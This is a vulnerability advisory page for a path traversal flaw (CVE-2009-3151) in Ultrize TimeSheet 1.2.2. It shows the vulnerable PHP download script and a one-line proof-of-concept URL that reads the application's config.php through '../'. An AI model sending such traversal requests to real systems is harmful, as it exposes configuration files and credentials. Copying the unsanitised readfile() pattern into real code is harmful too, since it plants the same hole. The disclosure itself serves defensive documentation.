Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability

2009-09-11 / 2009-09-12

Credit: None

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-3151

CWE: CWE-22

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability
Code page /actions/downloadFile.php
====
<?php
//** This script performs the actual file download
$fileName = $_REQUEST['fileName']; <--!!
$job_id = $_REQUEST['job_id']; <--!!
$fullFile = $config['upload_dir'].$job_id.'/'.$fileName; <--!!
if (file_exists($fullFile))
{
header("Content-Type: application/octet-stream");
header("Content-Length: ".filesize($fullFile));
header('Content-Disposition: attachment; fileName="'.$fileName.'"');
readfile($fullFile); <--!!
}
else
{
header("HTTP/1.0 404 Not Found");
print "<h1>File not found. </h1>";
print $fileName;
print "<hr>Please make sure your file paths are correct: {$config['upload_dir']}/{$job_id}/$fileName}<br />";
}
?>
====
Poc
/actions/downloadFile.php?fileName=../config.php

References:

http://xforce.iss.net/xforce/xfdb/52166

http://www.milw0rm.com/exploits/9307

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Ultrize TimeSheet 1.2.2 readfile() Local File Disclosure Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.